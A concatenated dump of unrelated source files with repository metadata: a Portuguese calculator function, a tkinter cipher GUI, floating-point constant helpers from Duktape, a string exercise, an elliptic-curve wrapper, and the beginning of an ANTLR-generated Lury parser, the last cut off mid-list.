2f380a1c03fd07b51070a7681d1c88a8151f7bad
| 613
|
py
|
Python
|
Aulas_2/Aula11/Calculadora.py
|
Sofista23/Aula2_Python
|
134d51bd7a33d753489ad2970a4f289273c93832
|
[
"MIT"
] | null | null | null |
Aulas_2/Aula11/Calculadora.py
|
Sofista23/Aula2_Python
|
134d51bd7a33d753489ad2970a4f289273c93832
|
[
"MIT"
] | null | null | null |
Aulas_2/Aula11/Calculadora.py
|
Sofista23/Aula2_Python
|
134d51bd7a33d753489ad2970a4f289273c93832
|
[
"MIT"
] | null | null | null |
def calculadora(x,y,alg):
if(alg=="+"):
r=x+y
print(f"A soma entre {x} e {y} é {r}!")
elif(alg=="-"):
if(x>y):
r=x-y
elif(x==y):
r=y-x
else:
r=y-x
print(f"A diferença entre {x} e {y} é {r}!")
elif(alg=="*"):
r=x*y
print(f"O produto entre {x} e {y} é {r}!")
elif(alg=="/"):
if(y==0):
print("Impossível dividir algo por 0!")
else:
r=x/y
print(f"O resultado da divisão entre {x} e {y} é {r}!")
else:
print("Dados fornecidos inválidos!")
| 26.652174
| 67
| 0.414356
|
8dc29eab421c0851afd7e0385ff68be9e30944f5
| 966
|
py
|
Python
|
gui.py
|
Laxar0/trial-app-ht
|
d32bdeac4a2f7c22640553743a66988ce2fea945
|
[
"MIT"
] | null | null | null |
gui.py
|
Laxar0/trial-app-ht
|
d32bdeac4a2f7c22640553743a66988ce2fea945
|
[
"MIT"
] | null | null | null |
gui.py
|
Laxar0/trial-app-ht
|
d32bdeac4a2f7c22640553743a66988ce2fea945
|
[
"MIT"
] | null | null | null |
from tkinter import *
root = Tk()
root.geometry("425x150")
root['bg'] = 'Gray'
root.resizable(height = False, width = False)
root.title('Encoding')
r_var = IntVar()
entry1 = Entry(width = 50)
label1 = Label(text = 'Шифруемый текст: ')
entry2 = Entry(width = 50)
label2 = Label(text = 'Ключ: ')
b = Button(width = 12, height = 1, text = 'Создать шифр')
label = Label(text = 'Пример шифра')
r1 = Radiobutton(text = 'Зашифровать', var = r_var, value = 1)
r2 = Radiobutton(text = 'Расшифровать', var = r_var, value = 2)
label1['bg'] = 'Gray'
label2['bg'] = 'Gray'
label['bg'] = 'Gray'
r1['bg'] = 'Gray'
r2['bg'] = 'Gray'
label1.grid(row = 0, column = 0, columnspan = 2)
entry1.grid(row = 0, column = 2)
label2.grid(row = 1, column = 0, columnspan = 2)
entry2.grid(row = 1, column = 2)
b.grid(row = 3, column = 0, columnspan = 3)
r1.grid(row = 2, column = 1, sticky = N)
r2.grid(row = 2, column = 2)
label.grid(row = 4, column = 0, columnspan = 3)
root.mainloop()
| 26.108108
| 63
| 0.63354
|
0dcc594ee5221cdc70fabc8849beaeca80df4cad
| 2,458
|
py
|
Python
|
util/gendoubleconsts.py
|
wenq1/duktape
|
5ed3eee19b291f3b3de0b212cc62c0aba0ab4ecb
|
[
"MIT"
] | 4,268
|
2015-01-01T17:33:40.000Z
|
2022-03-31T17:53:31.000Z
|
util/gendoubleconsts.py
|
KiraanRK/esp32-duktape
|
1b7fbcb8bd6bfc346d92df30ec099df7f13b03aa
|
[
"MIT"
] | 1,667
|
2015-01-01T22:43:03.000Z
|
2022-02-23T22:27:19.000Z
|
util/gendoubleconsts.py
|
KiraanRK/esp32-duktape
|
1b7fbcb8bd6bfc346d92df30ec099df7f13b03aa
|
[
"MIT"
] | 565
|
2015-01-08T14:15:28.000Z
|
2022-03-31T16:29:31.000Z
|
#!/usr/bin/env python2
#
# Double constants, see http://en.wikipedia.org/wiki/Double-precision_floating-point_format.
# YAML builtins metadata expressed the constants in binary form (8 bytes of
# IEEE double data) to ensure bit exactness.
#
import struct
import mpmath
def create_double_constants_mpmath():
# Just a helper to use manually
# http://mpmath.googlecode.com/svn/trunk/doc/build/basics.html
mpmath.mp.prec = 1000 # 1000 bits
def printhex(name, x):
# to hex string, ready for create_double()
hex = struct.pack('>d', float(str(x))).encode('hex')
flt = struct.unpack('>d', hex.decode('hex'))[0]
print '%-11s -> %s (= %.20f)' % (name, hex, flt)
printhex('DBL_E', mpmath.mpf(mpmath.e))
printhex('DBL_LN10', mpmath.log(10))
printhex('DBL_LN2', mpmath.log(2))
printhex('DBL_LOG2E', mpmath.log(mpmath.e) / mpmath.log(2))
printhex('DBL_LOG10E', mpmath.log(mpmath.e) / mpmath.log(10))
printhex('DBL_PI', mpmath.mpf(mpmath.pi))
printhex('DBL_SQRT1_2', mpmath.mpf(1) / mpmath.sqrt(2))
printhex('DBL_SQRT2', mpmath.sqrt(2))
create_double_constants_mpmath()
def create_double(x):
return struct.unpack('>d', x.decode('hex'))[0]
DBL_NAN = create_double('7ff8000000000000') # a NaN matching our "normalized NAN" definition (see duk_tval.h)
DBL_POSITIVE_INFINITY = create_double('7ff0000000000000') # positive infinity (unique)
DBL_NEGATIVE_INFINITY = create_double('fff0000000000000') # negative infinity (unique)
DBL_MAX_DOUBLE = create_double('7fefffffffffffff') # 'Max Double'
DBL_MIN_DOUBLE = create_double('0000000000000001') # 'Min subnormal positive double'
DBL_E = create_double('4005bf0a8b145769') # (= 2.71828182845904509080)
DBL_LN10 = create_double('40026bb1bbb55516') # (= 2.30258509299404590109)
DBL_LN2 = create_double('3fe62e42fefa39ef') # (= 0.69314718055994528623)
DBL_LOG2E = create_double('3ff71547652b82fe') # (= 1.44269504088896338700)
DBL_LOG10E = create_double('3fdbcb7b1526e50e') # (= 0.43429448190325181667)
DBL_PI = create_double('400921fb54442d18') # (= 3.14159265358979311600)
DBL_SQRT1_2 = create_double('3fe6a09e667f3bcd') # (= 0.70710678118654757274)
DBL_SQRT2 = create_double('3ff6a09e667f3bcd') # (= 1.41421356237309514547)
| 49.16
| 129
| 0.664361
|
37963681da48150a95ea2c996363c8ec0e2137e7
| 252
|
py
|
Python
|
python/easy/strings/mutations.py
|
Razor-87/hackerrank
|
b82dd1f97eeb3c2a9141b196b30b2820acd050e7
|
[
"Unlicense"
] | null | null | null |
python/easy/strings/mutations.py
|
Razor-87/hackerrank
|
b82dd1f97eeb3c2a9141b196b30b2820acd050e7
|
[
"Unlicense"
] | null | null | null |
python/easy/strings/mutations.py
|
Razor-87/hackerrank
|
b82dd1f97eeb3c2a9141b196b30b2820acd050e7
|
[
"Unlicense"
] | null | null | null |
# -*- coding: utf-8 -*-
def mutate_string(string: str, position: int, character: str) -> str:
"""
>>> mutate_string('abracadabra', 5, 'k')
'abrackdabra'
"""
lst = list(string)
lst[position] = character
return ''.join(lst)
| 21
| 69
| 0.571429
|
0efb702efb259e09689552b87aecca31b1d9bdb0
| 2,706
|
py
|
Python
|
cpp/py/ecpy/native/EC.py
|
andynuma/time-release-encryption-py3
|
a5c48d07fae8121b59100d4cd79d3e38402d928c
|
[
"MIT"
] | 48
|
2016-03-30T07:20:49.000Z
|
2022-01-27T10:48:43.000Z
|
cpp/py/ecpy/native/EC.py
|
andynuma/time-release-encryption-py3
|
a5c48d07fae8121b59100d4cd79d3e38402d928c
|
[
"MIT"
] | 11
|
2017-03-26T11:03:20.000Z
|
2021-06-01T15:54:03.000Z
|
cpp/py/ecpy/native/EC.py
|
andynuma/time-release-encryption-py3
|
a5c48d07fae8121b59100d4cd79d3e38402d928c
|
[
"MIT"
] | 12
|
2016-06-05T19:09:26.000Z
|
2021-04-18T04:23:20.000Z
|
from .library import *
from .FF import FF, FF_elem
from .EF import EF, EF_elem
import ast
class EC(NativeProxy):
def __init__(s, base, a, b):
s.base = base
s.a = a
s.b = b
if isinstance(base, FF):
ptr = lib.EC_FF_create(to_char_ptr(str(a)), to_char_ptr(str(b)), base.ptr)
tostring_func = lib.EC_FF_to_string
del_func = lib.EC_FF_delete
s.add_func = lib.EC_FF_add
s.sub_func = lib.EC_FF_sub
s.mul_func = lib.EC_FF_mul
s.type = 1
elif isinstance(base, EF):
ptr = lib.EC_EF_create(to_char_ptr(str(a)), to_char_ptr(str(b)), base.ptr, to_char_ptr(base.poly))
tostring_func = lib.EC_EF_to_string
del_func = lib.EC_EF_delete
s.add_func = lib.EC_EF_add
s.sub_func = lib.EC_EF_sub
s.mul_func = lib.EC_EF_mul
s.type = 2
NativeProxy.__init__(s, ptr, tostring_func, del_func)
def add(s, ret, a, b):
assert isinstance(ret, EC_elem) and isinstance(a, EC_elem) and isinstance(b, EC_elem)
s.add_func(s.ptr, ret.ptr, a.ptr, b.ptr)
def sub(s, ret, a, b):
assert isinstance(ret, EC_elem) and isinstance(a, EC_elem) and isinstance(b, EC_elem)
s.sub_func(s.ptr, ret.ptr, a.ptr, b.ptr)
def mul(s, ret, a, b):
assert isinstance(ret, EC_elem) and isinstance(a, EC_elem)
s.mul_func(s.ptr, ret.ptr, a.ptr, to_char_ptr(str(b)))
def div(s, ret, a, b):
raise NotImplementedError()
def pow(s, ret, a, b):
raise NotImplementedError()
class EC_elem(NativeProxy):
def __init__(s, curve, x, y, z=1):
from six import integer_types
def conv(x):
if s.curve.type == 1:
if isinstance(x, tuple):
return FF_elem(x[0])
else:
return FF_elem(x)
elif s.curve.type == 2:
if isinstance(x, tuple):
return EF_elem(x[0], x[1])
else:
return EF_elem(x, 0)
assert isinstance(curve, EC)
s.x = x
s.y = y
s.z = z
s.curve = curve
s.base = curve.base
if isinstance(x, integer_types + (tuple, )):
x = conv(x)
if isinstance(y, integer_types + (tuple, )):
y = conv(y)
if isinstance(z, integer_types + (tuple, )):
z = conv(z)
if s.curve.type == 1:
ptr = lib.EC_elem_FF_create(x.ptr, y.ptr, z.ptr)
tostring_func = lib.EC_elem_FF_to_string
del_func = lib.EC_elem_FF_delete
elif s.curve.type == 2:
ptr = lib.EC_elem_EF_create(x.ptr, y.ptr, z.ptr)
tostring_func = lib.EC_elem_EF_to_string
del_func = lib.EC_elem_EF_delete
NativeProxy.__init__(s, ptr, tostring_func, del_func)
def to_python(s):
r = str(s).lstrip("EC_elem").replace("EF_elem", "").replace("FF_elem", "")
return tuple(ast.literal_eval(r))
| 30.404494
| 104
| 0.626016
|
2e3bbbbb2e07a9074fbdbad5092e54d0b2cfd378
| 152,419
|
py
|
Python
|
src/LuryParser.py
|
lury-lang/expr2018
|
fcc5608041bdc2e82370451e2a40f024caf612de
|
[
"MIT"
] | null | null | null |
src/LuryParser.py
|
lury-lang/expr2018
|
fcc5608041bdc2e82370451e2a40f024caf612de
|
[
"MIT"
] | null | null | null |
src/LuryParser.py
|
lury-lang/expr2018
|
fcc5608041bdc2e82370451e2a40f024caf612de
|
[
"MIT"
] | null | null | null |
# Generated from Lury.g4 by ANTLR 4.7.1
# encoding: utf-8
from antlr4 import *
from io import StringIO
from typing.io import TextIO
import sys
def serializedATN():
with StringIO() as buf:
buf.write("\3\u608b\ua72a\u8133\ub9ed\u417c\u3be7\u7786\u5964\3A")
buf.write("\u0177\4\2\t\2\4\3\t\3\4\4\t\4\4\5\t\5\4\6\t\6\4\7\t\7")
buf.write("\4\b\t\b\4\t\t\t\4\n\t\n\4\13\t\13\4\f\t\f\4\r\t\r\4\16")
buf.write("\t\16\4\17\t\17\4\20\t\20\4\21\t\21\4\22\t\22\4\23\t\23")
buf.write("\4\24\t\24\4\25\t\25\4\26\t\26\4\27\t\27\4\30\t\30\4\31")
buf.write("\t\31\4\32\t\32\4\33\t\33\4\34\t\34\4\35\t\35\3\2\3\2")
buf.write("\7\2=\n\2\f\2\16\2@\13\2\3\2\3\2\3\3\3\3\3\4\3\4\3\4\7")
buf.write("\4I\n\4\f\4\16\4L\13\4\3\4\5\4O\n\4\3\4\3\4\3\5\3\5\3")
buf.write("\6\3\6\3\7\3\7\3\b\3\b\3\b\3\b\3\b\5\b^\n\b\3\t\3\t\3")
buf.write("\t\3\t\3\t\3\t\7\tf\n\t\f\t\16\ti\13\t\3\n\3\n\3\n\5\n")
buf.write("n\n\n\3\13\3\13\3\13\3\13\3\13\3\13\3\13\3\13\3\13\3\13")
buf.write("\3\13\3\13\3\13\3\13\3\13\3\13\3\13\3\13\3\13\3\13\3\13")
buf.write("\7\13\u0085\n\13\f\13\16\13\u0088\13\13\3\f\3\f\3\f\3")
buf.write("\f\3\f\3\f\3\f\3\f\3\f\7\f\u0093\n\f\f\f\16\f\u0096\13")
buf.write("\f\3\r\3\r\3\r\3\r\3\r\3\r\3\r\3\r\3\r\7\r\u00a1\n\r\f")
buf.write("\r\16\r\u00a4\13\r\3\16\3\16\3\16\3\16\3\16\3\16\7\16")
buf.write("\u00ac\n\16\f\16\16\16\u00af\13\16\3\17\3\17\3\17\3\17")
buf.write("\3\17\3\17\7\17\u00b7\n\17\f\17\16\17\u00ba\13\17\3\20")
buf.write("\3\20\3\20\3\20\3\20\3\20\7\20\u00c2\n\20\f\20\16\20\u00c5")
buf.write("\13\20\3\21\3\21\3\21\3\21\3\21\3\21\3\21\3\21\3\21\7")
buf.write("\21\u00d0\n\21\f\21\16\21\u00d3\13\21\3\22\3\22\3\22\3")
buf.write("\22\3\22\3\22\3\22\3\22\3\22\3\22\3\22\3\22\7\22\u00e1")
buf.write("\n\22\f\22\16\22\u00e4\13\22\3\23\3\23\3\23\3\23\3\23")
buf.write("\3\23\3\23\3\23\3\23\3\23\3\23\3\23\3\23\3\23\3\23\7\23")
buf.write("\u00f5\n\23\f\23\16\23\u00f8\13\23\3\24\3\24\3\24\5\24")
buf.write("\u00fd\n\24\3\25\3\25\3\25\5\25\u0102\n\25\3\26\3\26\3")
buf.write("\26\3\26\3\26\3\26\3\26\3\26\3\26\3\26\3\26\3\26\7\26")
buf.write("\u0110\n\26\f\26\16\26\u0113\13\26\3\27\3\27\3\30\3\30")
buf.write("\3\30\3\30\3\30\3\30\3\30\3\30\3\30\5\30\u0120\n\30\3")
buf.write("\31\3\31\3\31\3\31\3\31\5\31\u0127\n\31\3\32\3\32\5\32")
buf.write("\u012b\n\32\3\32\3\32\3\33\3\33\3\33\5\33\u0132\n\33\3")
buf.write("\33\3\33\3\33\3\33\5\33\u0138\n\33\7\33\u013a\n\33\f\33")
buf.write("\16\33\u013d\13\33\3\34\3\34\5\34\u0141\n\34\3\34\3\34")
buf.write("\3\35\3\35\3\35\3\35\3\35\5\35\u014a\n\35\3\35\3\35\3")
buf.write("\35\3\35\3\35\3\35\5\35\u0152\n\35\3\35\3\35\5\35\u0156")
buf.write("\n\35\5\35\u0158\n\35\3\35\3\35\3\35\3\35\3\35\3\35\5")
buf.write("\35\u0160\n\35\3\35\3\35\3\35\3\35\3\35\3\35\3\35\3\35")
buf.write("\5\35\u016a\n\35\3\35\3\35\3\35\3\35\5\35\u0170\n\35\7")
buf.write("\35\u0172\n\35\f\35\16\35\u0175\13\35\3\35\2\17\20\24")
buf.write("\26\30\32\34\36 \"$*\648\36\2\4\6\b\n\f\16\20\22\24\26")
buf.write("\30\32\34\36 \"$&(*,.\60\62\64\668\2\5\3\2\4\21\4\2#%")
buf.write("+,\3\2:=\2\u0195\2>\3\2\2\2\4C\3\2\2\2\6E\3\2\2\2\bR\3")
buf.write("\2\2\2\nT\3\2\2\2\fV\3\2\2\2\16]\3\2\2\2\20_\3\2\2\2\22")
buf.write("m\3\2\2\2\24o\3\2\2\2\26\u0089\3\2\2\2\30\u0097\3\2\2")
buf.write("\2\32\u00a5\3\2\2\2\34\u00b0\3\2\2\2\36\u00bb\3\2\2\2")
buf.write(" \u00c6\3\2\2\2\"\u00d4\3\2\2\2$\u00e5\3\2\2\2&\u00f9")
buf.write("\3\2\2\2(\u0101\3\2\2\2*\u0103\3\2\2\2,\u0114\3\2\2\2")
buf.write(".\u011f\3\2\2\2\60\u0126\3\2\2\2\62\u0128\3\2\2\2\64\u012e")
buf.write("\3\2\2\2\66\u013e\3\2\2\28\u0157\3\2\2\2:=\7\67\2\2;=")
buf.write("\5\4\3\2<:\3\2\2\2<;\3\2\2\2=@\3\2\2\2><\3\2\2\2>?\3\2")
buf.write("\2\2?A\3\2\2\2@>\3\2\2\2AB\7\2\2\3B\3\3\2\2\2CD\5\6\4")
buf.write("\2D\5\3\2\2\2EJ\5\b\5\2FG\7\3\2\2GI\5\b\5\2HF\3\2\2\2")
buf.write("IL\3\2\2\2JH\3\2\2\2JK\3\2\2\2KN\3\2\2\2LJ\3\2\2\2MO\7")
buf.write("\3\2\2NM\3\2\2\2NO\3\2\2\2OP\3\2\2\2PQ\7\67\2\2Q\7\3\2")
buf.write("\2\2RS\5\n\6\2S\t\3\2\2\2TU\5\f\7\2U\13\3\2\2\2VW\5\16")
buf.write("\b\2W\r\3\2\2\2XY\5*\26\2YZ\t\2\2\2Z[\5\16\b\2[^\3\2\2")
buf.write("\2\\^\5\20\t\2]X\3\2\2\2]\\\3\2\2\2^\17\3\2\2\2_`\b\t")
buf.write("\1\2`a\5\22\n\2ag\3\2\2\2bc\f\4\2\2cd\7\22\2\2df\5\22")
buf.write("\n\2eb\3\2\2\2fi\3\2\2\2ge\3\2\2\2gh\3\2\2\2h\21\3\2\2")
buf.write("\2ig\3\2\2\2jk\7\23\2\2kn\5\22\n\2ln\5\24\13\2mj\3\2\2")
buf.write("\2ml\3\2\2\2n\23\3\2\2\2op\b\13\1\2pq\5\26\f\2q\u0086")
buf.write("\3\2\2\2rs\f\t\2\2st\7\24\2\2t\u0085\5\26\f\2uv\f\b\2")
buf.write("\2vw\7\25\2\2w\u0085\5\26\f\2xy\f\7\2\2yz\7\26\2\2z\u0085")
buf.write("\5\26\f\2{|\f\6\2\2|}\7\27\2\2}\u0085\5\26\f\2~\177\f")
buf.write("\5\2\2\177\u0080\7\30\2\2\u0080\u0085\5\26\f\2\u0081\u0082")
buf.write("\f\4\2\2\u0082\u0083\7\31\2\2\u0083\u0085\5\26\f\2\u0084")
buf.write("r\3\2\2\2\u0084u\3\2\2\2\u0084x\3\2\2\2\u0084{\3\2\2\2")
buf.write("\u0084~\3\2\2\2\u0084\u0081\3\2\2\2\u0085\u0088\3\2\2")
buf.write("\2\u0086\u0084\3\2\2\2\u0086\u0087\3\2\2\2\u0087\25\3")
buf.write("\2\2\2\u0088\u0086\3\2\2\2\u0089\u008a\b\f\1\2\u008a\u008b")
buf.write("\5\30\r\2\u008b\u0094\3\2\2\2\u008c\u008d\f\5\2\2\u008d")
buf.write("\u008e\7\32\2\2\u008e\u0093\5\30\r\2\u008f\u0090\f\4\2")
buf.write("\2\u0090\u0091\7\33\2\2\u0091\u0093\5\30\r\2\u0092\u008c")
buf.write("\3\2\2\2\u0092\u008f\3\2\2\2\u0093\u0096\3\2\2\2\u0094")
buf.write("\u0092\3\2\2\2\u0094\u0095\3\2\2\2\u0095\27\3\2\2\2\u0096")
buf.write("\u0094\3\2\2\2\u0097\u0098\b\r\1\2\u0098\u0099\5\32\16")
buf.write("\2\u0099\u00a2\3\2\2\2\u009a\u009b\f\5\2\2\u009b\u009c")
buf.write("\7\34\2\2\u009c\u00a1\5\32\16\2\u009d\u009e\f\4\2\2\u009e")
buf.write("\u009f\7\35\2\2\u009f\u00a1\5\32\16\2\u00a0\u009a\3\2")
buf.write("\2\2\u00a0\u009d\3\2\2\2\u00a1\u00a4\3\2\2\2\u00a2\u00a0")
buf.write("\3\2\2\2\u00a2\u00a3\3\2\2\2\u00a3\31\3\2\2\2\u00a4\u00a2")
buf.write("\3\2\2\2\u00a5\u00a6\b\16\1\2\u00a6\u00a7\5\34\17\2\u00a7")
buf.write("\u00ad\3\2\2\2\u00a8\u00a9\f\4\2\2\u00a9\u00aa\7\36\2")
buf.write("\2\u00aa\u00ac\5\34\17\2\u00ab\u00a8\3\2\2\2\u00ac\u00af")
buf.write("\3\2\2\2\u00ad\u00ab\3\2\2\2\u00ad\u00ae\3\2\2\2\u00ae")
buf.write("\33\3\2\2\2\u00af\u00ad\3\2\2\2\u00b0\u00b1\b\17\1\2\u00b1")
buf.write("\u00b2\5\36\20\2\u00b2\u00b8\3\2\2\2\u00b3\u00b4\f\4\2")
buf.write("\2\u00b4\u00b5\7\37\2\2\u00b5\u00b7\5\36\20\2\u00b6\u00b3")
buf.write("\3\2\2\2\u00b7\u00ba\3\2\2\2\u00b8\u00b6\3\2\2\2\u00b8")
buf.write("\u00b9\3\2\2\2\u00b9\35\3\2\2\2\u00ba\u00b8\3\2\2\2\u00bb")
buf.write("\u00bc\b\20\1\2\u00bc\u00bd\5 \21\2\u00bd\u00c3\3\2\2")
buf.write("\2\u00be\u00bf\f\4\2\2\u00bf\u00c0\7 \2\2\u00c0\u00c2")
buf.write("\5 \21\2\u00c1\u00be\3\2\2\2\u00c2\u00c5\3\2\2\2\u00c3")
buf.write("\u00c1\3\2\2\2\u00c3\u00c4\3\2\2\2\u00c4\37\3\2\2\2\u00c5")
buf.write("\u00c3\3\2\2\2\u00c6\u00c7\b\21\1\2\u00c7\u00c8\5\"\22")
buf.write("\2\u00c8\u00d1\3\2\2\2\u00c9\u00ca\f\5\2\2\u00ca\u00cb")
buf.write("\7!\2\2\u00cb\u00d0\5\"\22\2\u00cc\u00cd\f\4\2\2\u00cd")
buf.write("\u00ce\7\"\2\2\u00ce\u00d0\5\"\22\2\u00cf\u00c9\3\2\2")
buf.write("\2\u00cf\u00cc\3\2\2\2\u00d0\u00d3\3\2\2\2\u00d1\u00cf")
buf.write("\3\2\2\2\u00d1\u00d2\3\2\2\2\u00d2!\3\2\2\2\u00d3\u00d1")
buf.write("\3\2\2\2\u00d4\u00d5\b\22\1\2\u00d5\u00d6\5$\23\2\u00d6")
buf.write("\u00e2\3\2\2\2\u00d7\u00d8\f\6\2\2\u00d8\u00d9\7#\2\2")
buf.write("\u00d9\u00e1\5$\23\2\u00da\u00db\f\5\2\2\u00db\u00dc\7")
buf.write("$\2\2\u00dc\u00e1\5$\23\2\u00dd\u00de\f\4\2\2\u00de\u00df")
buf.write("\7%\2\2\u00df\u00e1\5$\23\2\u00e0\u00d7\3\2\2\2\u00e0")
buf.write("\u00da\3\2\2\2\u00e0\u00dd\3\2\2\2\u00e1\u00e4\3\2\2\2")
buf.write("\u00e2\u00e0\3\2\2\2\u00e2\u00e3\3\2\2\2\u00e3#\3\2\2")
buf.write("\2\u00e4\u00e2\3\2\2\2\u00e5\u00e6\b\23\1\2\u00e6\u00e7")
buf.write("\5&\24\2\u00e7\u00f6\3\2\2\2\u00e8\u00e9\f\7\2\2\u00e9")
buf.write("\u00ea\7&\2\2\u00ea\u00f5\5&\24\2\u00eb\u00ec\f\6\2\2")
buf.write("\u00ec\u00ed\7\'\2\2\u00ed\u00f5\5&\24\2\u00ee\u00ef\f")
buf.write("\5\2\2\u00ef\u00f0\7(\2\2\u00f0\u00f5\5&\24\2\u00f1\u00f2")
buf.write("\f\4\2\2\u00f2\u00f3\7)\2\2\u00f3\u00f5\5&\24\2\u00f4")
buf.write("\u00e8\3\2\2\2\u00f4\u00eb\3\2\2\2\u00f4\u00ee\3\2\2\2")
buf.write("\u00f4\u00f1\3\2\2\2\u00f5\u00f8\3\2\2\2\u00f6\u00f4\3")
buf.write("\2\2\2\u00f6\u00f7\3\2\2\2\u00f7%\3\2\2\2\u00f8\u00f6")
buf.write("\3\2\2\2\u00f9\u00fc\5(\25\2\u00fa\u00fb\7*\2\2\u00fb")
buf.write("\u00fd\5&\24\2\u00fc\u00fa\3\2\2\2\u00fc\u00fd\3\2\2\2")
buf.write("\u00fd\'\3\2\2\2\u00fe\u00ff\t\3\2\2\u00ff\u0102\5(\25")
buf.write("\2\u0100\u0102\5*\26\2\u0101\u00fe\3\2\2\2\u0101\u0100")
buf.write("\3\2\2\2\u0102)\3\2\2\2\u0103\u0104\b\26\1\2\u0104\u0105")
buf.write("\5.\30\2\u0105\u0111\3\2\2\2\u0106\u0107\f\6\2\2\u0107")
buf.write("\u0110\7+\2\2\u0108\u0109\f\5\2\2\u0109\u0110\7,\2\2\u010a")
buf.write("\u010b\f\4\2\2\u010b\u010c\7-\2\2\u010c\u010d\5,\27\2")
buf.write("\u010d\u010e\7.\2\2\u010e\u0110\3\2\2\2\u010f\u0106\3")
buf.write("\2\2\2\u010f\u0108\3\2\2\2\u010f\u010a\3\2\2\2\u0110\u0113")
buf.write("\3\2\2\2\u0111\u010f\3\2\2\2\u0111\u0112\3\2\2\2\u0112")
buf.write("+\3\2\2\2\u0113\u0111\3\2\2\2\u0114\u0115\5.\30\2\u0115")
buf.write("-\3\2\2\2\u0116\u0120\78\2\2\u0117\u0120\5\60\31\2\u0118")
buf.write("\u0120\7/\2\2\u0119\u0120\7\60\2\2\u011a\u0120\7\61\2")
buf.write("\2\u011b\u011c\7\62\2\2\u011c\u011d\5\f\7\2\u011d\u011e")
buf.write("\7\63\2\2\u011e\u0120\3\2\2\2\u011f\u0116\3\2\2\2\u011f")
buf.write("\u0117\3\2\2\2\u011f\u0118\3\2\2\2\u011f\u0119\3\2\2\2")
buf.write("\u011f\u011a\3\2\2\2\u011f\u011b\3\2\2\2\u0120/\3\2\2")
buf.write("\2\u0121\u0127\79\2\2\u0122\u0127\7>\2\2\u0123\u0127\t")
buf.write("\4\2\2\u0124\u0127\5\62\32\2\u0125\u0127\5\66\34\2\u0126")
buf.write("\u0121\3\2\2\2\u0126\u0122\3\2\2\2\u0126\u0123\3\2\2\2")
buf.write("\u0126\u0124\3\2\2\2\u0126\u0125\3\2\2\2\u0127\61\3\2")
buf.write("\2\2\u0128\u012a\7-\2\2\u0129\u012b\5\64\33\2\u012a\u0129")
buf.write("\3\2\2\2\u012a\u012b\3\2\2\2\u012b\u012c\3\2\2\2\u012c")
buf.write("\u012d\7.\2\2\u012d\63\3\2\2\2\u012e\u012f\b\33\1\2\u012f")
buf.write("\u0131\5\22\n\2\u0130\u0132\7\22\2\2\u0131\u0130\3\2\2")
buf.write("\2\u0131\u0132\3\2\2\2\u0132\u013b\3\2\2\2\u0133\u0134")
buf.write("\f\4\2\2\u0134\u0135\7\22\2\2\u0135\u0137\5\22\n\2\u0136")
buf.write("\u0138\7\22\2\2\u0137\u0136\3\2\2\2\u0137\u0138\3\2\2")
buf.write("\2\u0138\u013a\3\2\2\2\u0139\u0133\3\2\2\2\u013a\u013d")
buf.write("\3\2\2\2\u013b\u0139\3\2\2\2\u013b\u013c\3\2\2\2\u013c")
buf.write("\65\3\2\2\2\u013d\u013b\3\2\2\2\u013e\u0140\7\64\2\2\u013f")
buf.write("\u0141\58\35\2\u0140\u013f\3\2\2\2\u0140\u0141\3\2\2\2")
buf.write("\u0141\u0142\3\2\2\2\u0142\u0143\7\65\2\2\u0143\67\3\2")
buf.write("\2\2\u0144\u0145\b\35\1\2\u0145\u0146\5.\30\2\u0146\u0147")
buf.write("\7\66\2\2\u0147\u0149\5\22\n\2\u0148\u014a\7\22\2\2\u0149")
buf.write("\u0148\3\2\2\2\u0149\u014a\3\2\2\2\u014a\u0158\3\2\2\2")
buf.write("\u014b\u014c\7-\2\2\u014c\u014d\5.\30\2\u014d\u014e\7")
buf.write(".\2\2\u014e\u014f\7\66\2\2\u014f\u0151\5\22\n\2\u0150")
buf.write("\u0152\7\22\2\2\u0151\u0150\3\2\2\2\u0151\u0152\3\2\2")
buf.write("\2\u0152\u0158\3\2\2\2\u0153\u0155\78\2\2\u0154\u0156")
buf.write("\7\22\2\2\u0155\u0154\3\2\2\2\u0155\u0156\3\2\2\2\u0156")
buf.write("\u0158\3\2\2\2\u0157\u0144\3\2\2\2\u0157\u014b\3\2\2\2")
buf.write("\u0157\u0153\3\2\2\2\u0158\u0173\3\2\2\2\u0159\u015a\f")
buf.write("\b\2\2\u015a\u015b\7\22\2\2\u015b\u015c\5.\30\2\u015c")
buf.write("\u015d\7\66\2\2\u015d\u015f\5\22\n\2\u015e\u0160\7\22")
buf.write("\2\2\u015f\u015e\3\2\2\2\u015f\u0160\3\2\2\2\u0160\u0172")
buf.write("\3\2\2\2\u0161\u0162\f\7\2\2\u0162\u0163\7\22\2\2\u0163")
buf.write("\u0164\7-\2\2\u0164\u0165\5.\30\2\u0165\u0166\7.\2\2\u0166")
buf.write("\u0167\7\66\2\2\u0167\u0169\5\22\n\2\u0168\u016a\7\22")
buf.write("\2\2\u0169\u0168\3\2\2\2\u0169\u016a\3\2\2\2\u016a\u0172")
buf.write("\3\2\2\2\u016b\u016c\f\6\2\2\u016c\u016d\7\22\2\2\u016d")
buf.write("\u016f\78\2\2\u016e\u0170\7\22\2\2\u016f\u016e\3\2\2\2")
buf.write("\u016f\u0170\3\2\2\2\u0170\u0172\3\2\2\2\u0171\u0159\3")
buf.write("\2\2\2\u0171\u0161\3\2\2\2\u0171\u016b\3\2\2\2\u0172\u0175")
buf.write("\3\2\2\2\u0173\u0171\3\2\2\2\u0173\u0174\3\2\2\2\u0174")
buf.write("9\3\2\2\2\u0175\u0173\3\2\2\2,<>JN]gm\u0084\u0086\u0092")
buf.write("\u0094\u00a0\u00a2\u00ad\u00b8\u00c3\u00cf\u00d1\u00e0")
buf.write("\u00e2\u00f4\u00f6\u00fc\u0101\u010f\u0111\u011f\u0126")
buf.write("\u012a\u0131\u0137\u013b\u0140\u0149\u0151\u0155\u0157")
buf.write("\u015f\u0169\u016f\u0171\u0173")
return buf.getvalue()
class LuryParser ( Parser ):
grammarFileName = "Lury.g4"
atn = ATNDeserializer().deserialize(serializedATN())
decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]
sharedContextCache = PredictionContextCache()
literalNames = [ "<INVALID>", "';'", "'='", "'+='", "'-='", "'~='",
"'*='", "'/='", "'//='", "'%='", "'&='", "'|='", "'^='",
"'<<='", "'>>='", "'**='", "','", "'not'", "'>'", "'<'",
"'=='", "'<='", "'>='", "'!='", "'..'", "'...'", "'in'",
"'not in'", "'|'", "'^'", "'&'", "'<<'", "'>>'", "'+'",
"'-'", "'~'", "'*'", "'/'", "'//'", "'%'", "'**'",
"'++'", "'--'", "'['", "']'", "'true'", "'false'",
